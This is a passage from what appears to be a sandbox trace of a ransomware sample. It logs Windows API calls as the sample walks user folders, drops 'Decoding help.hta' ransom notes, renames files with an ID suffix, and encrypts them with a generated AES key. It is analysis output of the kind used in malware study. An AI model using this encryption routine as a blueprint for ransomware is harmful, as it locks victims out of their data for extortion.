lpNumberOfBytesWritten=0xd58fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0041.479] CloseHandle (hObject=0x310) returned 1 [0041.479] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0041.480] lstrcmpiW (lpString1="Decoding help.hta", lpString2="desktop.ini") returned -1 [0041.480] lstrlenW (lpString="desktop.ini") returned 11 [0041.480] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\*.*" [0041.480] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\*.*") returned 47 [0041.480] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\", lpString2="desktop.ini" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\desktop.ini") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\desktop.ini" [0041.480] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\desktop.ini" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\desktop.ini") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\desktop.ini" [0041.480] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\desktop.ini", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\desktop.ini.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\desktop.ini.[ID]g9uZrLhJaygpwRm1[ID]" [0041.480] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\desktop.ini"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\desktop.ini.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\desktop.ini.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0041.480] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\desktop.ini.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\desktop.ini.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x310 [0041.481] CreateFileMappingA (hFile=0x310, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x2f0 [0041.481] CryptAcquireContextA (in: phProv=0xd58fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xd58fcec*=0x3449bd8) returned 1 [0043.850] CryptGenKey (in: hProv=0x3449bd8, Algid=0x6610, dwFlags=0x1, phKey=0xd58fce8 | out: phKey=0xd58fce8*=0x5a6070) returned 1 [0043.850] CryptExportKey (in: hKey=0x5a6070, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0xd58fbe4, pdwDataLen=0xd58fce4 | out: pbData=0xd58fbe4*, pdwDataLen=0xd58fce4*=0x2c) returned 1 [0043.850] MapViewOfFile (hFileMappingObject=0x2f0, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x180) returned 0x3980000 [0045.652] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xd58fbe4*, pdwDataLen=0xd58fcf8*=0x40, dwBufLen=0x100 | out: pbData=0xd58fbe4*, pdwDataLen=0xd58fcf8*=0x100) returned 1 [0048.855] CryptEncrypt (in: hKey=0x5a6070, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3980000*, pdwDataLen=0xd58fce4*=0x180, dwBufLen=0x180 | out: pbData=0x3980000*, pdwDataLen=0xd58fce4*=0x180) returned 1 [0048.855] UnmapViewOfFile (lpBaseAddress=0x3980000) returned 1 [0048.856] CloseHandle (hObject=0x2f0) returned 1 [0048.856] CryptDestroyKey (hKey=0x5a6070) returned 1 [0048.856] CryptReleaseContext (hProv=0x3449bd8, dwFlags=0x0) returned 1 [0048.856] SetFilePointerEx (in: hFile=0x310, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0048.856] WriteFile (in: hFile=0x310, lpBuffer=0xd58fbe4*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0xd58fcf8, lpOverlapped=0x0 | out: lpBuffer=0xd58fbe4*, lpNumberOfBytesWritten=0xd58fcf8*=0x100, lpOverlapped=0x0) returned 1 [0052.695] WriteFile (in: hFile=0x310, lpBuffer=0x4040f0*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0xd58fcf8, lpOverlapped=0x0 | out: lpBuffer=0x4040f0*, lpNumberOfBytesWritten=0xd58fcf8*=0x500, lpOverlapped=0x0) returned 1 [0052.695] CloseHandle (hObject=0x310) returned 1 [0053.676] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\desktop.ini.[ID]g9uZrLhJaygpwRm1[ID]", dwFileAttributes=0x1) returned 1 [0058.415] FindNextFileW (in: hFindFile=0x5a5a30, lpFindFileData=0xd58fd30 | out: lpFindFileData=0xd58fd30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x52cd1930, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xbae0ad90, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Links", cAlternateFileName="")) returned 1 [0058.415] lstrcmpW (lpString1=".", lpString2="Links") returned -1 [0058.415] lstrcmpW (lpString1="..", lpString2="Links") returned -1 [0058.415] lstrcmpiW (lpString1="windows", lpString2="Links") returned 1 [0058.415] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\*.*" [0058.415] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\*.*") returned 47 [0058.415] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\", lpString2="Links" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links" [0058.415] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\*.*" [0058.415] GlobalMemoryStatus (in: lpBuffer=0xd58fd10 | out: lpBuffer=0xd58fd10) [0058.415] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x97923d0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xc0c [0058.416] CloseHandle (hObject=0xc0c) returned 1 [0058.416] FindNextFileW (in: hFindFile=0x5a5a30, lpFindFileData=0xd58fd30 | out: lpFindFileData=0xd58fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe5472dd, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft Websites", cAlternateFileName="MICROS~1")) returned 1 [0058.416] lstrcmpW (lpString1=".", lpString2="Microsoft Websites") returned -1 [0058.416] lstrcmpW (lpString1="..", lpString2="Microsoft Websites") returned -1 [0058.416] lstrcmpiW (lpString1="windows", lpString2="Microsoft Websites") returned 1 [0058.416] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\*.*" [0058.416] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\*.*") returned 47 [0058.416] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\", lpString2="Microsoft Websites" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites" [0058.416] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\*.*" [0058.416] GlobalMemoryStatus (in: lpBuffer=0xd58fd10 | out: lpBuffer=0xd58fd10) [0058.416] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x10f573e0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xc0c [0058.417] CloseHandle (hObject=0xc0c) returned 1 [0058.417] FindNextFileW (in: hFindFile=0x5a5a30, lpFindFileData=0xd58fd30 | out: lpFindFileData=0xd58fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe4d4ebc, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSN Websites", cAlternateFileName="MSNWEB~1")) returned 1 [0058.417] lstrcmpW (lpString1=".", lpString2="MSN Websites") returned -1 [0058.417] lstrcmpW (lpString1="..", lpString2="MSN Websites") returned -1 [0058.417] lstrcmpiW (lpString1="windows", lpString2="MSN Websites") returned 1 [0058.417] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\*.*" [0058.417] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\*.*") returned 47 [0058.417] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\", lpString2="MSN Websites" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites" [0058.417] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\*.*" [0058.418] GlobalMemoryStatus (in: lpBuffer=0xd58fd10 | out: lpBuffer=0xd58fd10) [0058.418] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x2481d950, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xc0c [0058.418] CloseHandle (hObject=0xc0c) returned 1 [0058.418] FindNextFileW (in: hFindFile=0x5a5a30, lpFindFileData=0xd58fd30 | out: lpFindFileData=0xd58fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d71a60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe5472dd, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Live", cAlternateFileName="WINDOW~1")) returned 1 [0058.418] lstrcmpW (lpString1=".", lpString2="Windows Live") returned -1 [0058.418] lstrcmpW (lpString1="..", lpString2="Windows Live") returned -1 [0058.418] lstrcmpiW (lpString1="windows", lpString2="Windows Live") returned -1 [0058.419] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\*.*" [0058.419] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\*.*") returned 47 [0058.419] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\", lpString2="Windows Live" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live" [0058.419] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\*.*" [0058.419] GlobalMemoryStatus (in: lpBuffer=0xd58fd10 | out: lpBuffer=0xd58fd10) [0058.419] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x10c86800, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xc0c [0058.420] CloseHandle (hObject=0xc0c) returned 1 [0058.420] FindNextFileW (in: hFindFile=0x5a5a30, lpFindFileData=0xd58fd30 | out: lpFindFileData=0xd58fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d71a60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe5472dd, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Live", cAlternateFileName="WINDOW~1")) returned 0 [0058.420] FindClose (in: hFindFile=0x5a5a30 | out: hFindFile=0x5a5a30) returned 1 Thread: id = 169 os_tid = 0x114 [0040.298] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Microsoft Sync Framework\\v1.0\\*.*", lpFindFileData=0xd6cfd30 | out: lpFindFileData=0xd6cfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x50e7acd0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6626d2b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6626d2b0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5a5a70 [0040.298] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0040.298] FindNextFileW (in: hFindFile=0x5a5a70, lpFindFileData=0xd6cfd30 | out: lpFindFileData=0xd6cfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x50e7acd0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6626d2b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6626d2b0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0040.298] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0040.298] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0040.298] FindNextFileW (in: hFindFile=0x5a5a70, lpFindFileData=0xd6cfd30 | out: lpFindFileData=0xd6cfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6626d2b0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6626d2b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6626d2b0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Documentation", cAlternateFileName="DOCUME~1")) returned 1 [0040.298] lstrcmpW (lpString1=".", lpString2="Documentation") returned -1 [0040.298] lstrcmpW (lpString1="..", lpString2="Documentation") returned -1 [0040.298] lstrcmpiW (lpString1="windows", lpString2="Documentation") returned 1 [0040.298] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Microsoft Sync Framework\\v1.0\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Microsoft Sync Framework\\v1.0\\*.*") returned="\\\\?\\C:\\Program Files\\Microsoft Sync Framework\\v1.0\\*.*" [0040.298] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Sync Framework\\v1.0\\*.*") returned 54 [0040.298] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Microsoft Sync Framework\\v1.0\\", lpString2="Documentation" | out: lpString1="\\\\?\\C:\\Program Files\\Microsoft Sync Framework\\v1.0\\Documentation") returned="\\\\?\\C:\\Program Files\\Microsoft Sync Framework\\v1.0\\Documentation" [0040.298] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Microsoft Sync Framework\\v1.0\\Documentation", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Microsoft Sync Framework\\v1.0\\Documentation\\*.*") returned="\\\\?\\C:\\Program Files\\Microsoft Sync Framework\\v1.0\\Documentation\\*.*" [0040.299] GlobalMemoryStatus (in: lpBuffer=0xd6cfd10 | out: lpBuffer=0xd6cfd10) [0040.299] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x96d2090, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x26c [0040.299] CloseHandle (hObject=0x26c) returned 1 [0040.299] FindNextFileW (in: hFindFile=0x5a5a70, lpFindFileData=0xd6cfd30 | out: lpFindFileData=0xd6cfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x50e7acd0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x50e7acd0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x50e7acd0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Runtime", cAlternateFileName="")) returned 1 [0040.299] lstrcmpW (lpString1=".", lpString2="Runtime") returned -1 [0040.299] lstrcmpW (lpString1="..", lpString2="Runtime") returned -1 [0040.299] lstrcmpiW (lpString1="windows", lpString2="Runtime") returned 1 [0040.300] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Microsoft Sync Framework\\v1.0\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Microsoft Sync Framework\\v1.0\\*.*") returned="\\\\?\\C:\\Program Files\\Microsoft Sync Framework\\v1.0\\*.*" [0040.300] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Sync Framework\\v1.0\\*.*") returned 54 [0040.300] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Microsoft Sync Framework\\v1.0\\", lpString2="Runtime" | out: lpString1="\\\\?\\C:\\Program Files\\Microsoft Sync Framework\\v1.0\\Runtime") returned="\\\\?\\C:\\Program Files\\Microsoft Sync Framework\\v1.0\\Runtime" [0040.300] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Microsoft Sync Framework\\v1.0\\Runtime", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Microsoft Sync Framework\\v1.0\\Runtime\\*.*") returned="\\\\?\\C:\\Program Files\\Microsoft Sync Framework\\v1.0\\Runtime\\*.*" [0040.300] GlobalMemoryStatus (in: lpBuffer=0xd6cfd10 | out: lpBuffer=0xd6cfd10) [0040.300] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x96ea0f8, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x26c [0040.301] CloseHandle (hObject=0x26c) returned 1 [0040.301] FindNextFileW (in: hFindFile=0x5a5a70, lpFindFileData=0xd6cfd30 | out: lpFindFileData=0xd6cfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x50e7acd0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x50e7acd0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x50e7acd0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Runtime", cAlternateFileName="")) returned 0 [0040.301] FindClose (in: hFindFile=0x5a5a70 | out: hFindFile=0x5a5a70) returned 1 Thread: id = 170 os_tid = 0x714 [0040.302] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Documents\\*.*", lpFindFileData=0x610fd30 | out: lpFindFileData=0x610fd30*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x27f, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0xffff, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff Thread: id = 171 os_tid = 0x178 [0040.303] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\*.*", lpFindFileData=0xd80fd30 | out: lpFindFileData=0xd80fd30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5a5a70 [0040.303] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0040.303] FindNextFileW (in: hFindFile=0x5a5a70, lpFindFileData=0xd80fd30 | out: lpFindFileData=0xd80fd30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0040.303] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0040.303] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0040.303] FindNextFileW (in: hFindFile=0x5a5a70, lpFindFileData=0xd80fd30 | out: lpFindFileData=0xd80fd30*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x244, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0040.303] lstrcpyW (in: lpString1=0x41e04c8, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\*.*" [0040.303] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\*.*") returned 43 [0040.303] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\Decoding help.hta") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\Decoding help.hta" [0040.303] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\Decoding help.hta" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\links\\decoding help.hta")) returned 0xffffffff [0040.303] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\Decoding help.hta" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\links\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0040.771] WriteFile (in: hFile=0x324, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0xd80fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0xd80fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0040.772] CloseHandle (hObject=0x324) returned 1 [0040.772] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0041.169] lstrcmpiW (lpString1="Decoding help.hta", lpString2="desktop.ini") returned -1 [0041.169] lstrlenW (lpString="desktop.ini") returned 11 [0041.169] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\*.*" [0041.169] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\*.*") returned 43 [0041.169] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\", lpString2="desktop.ini" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\desktop.ini") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\desktop.ini" [0041.169] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\desktop.ini" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\desktop.ini") 